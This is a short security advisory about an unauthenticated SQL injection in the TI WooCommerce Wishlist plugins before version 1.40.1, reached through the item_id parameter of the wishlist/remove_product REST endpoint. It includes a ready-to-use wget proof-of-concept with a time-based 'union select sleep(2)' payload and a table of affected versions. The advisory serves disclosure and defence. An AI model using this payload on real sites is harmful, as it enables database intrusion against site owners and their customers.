The plugins do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks
time wget ‘https://example.com/?rest_route=/wc/v3/wishlist/remove_product/1&item;_id=0 union select sleep(2) -- g’ Even though it will produce an error 400, the payload is processed and response delayed
CPE | Name | Operator | Version |
---|---|---|---|
ti-woocommerce-wishlist | lt | 1.40.1 | |
ti-woocommerce-wishlist-premium | lt | 1.40.1 |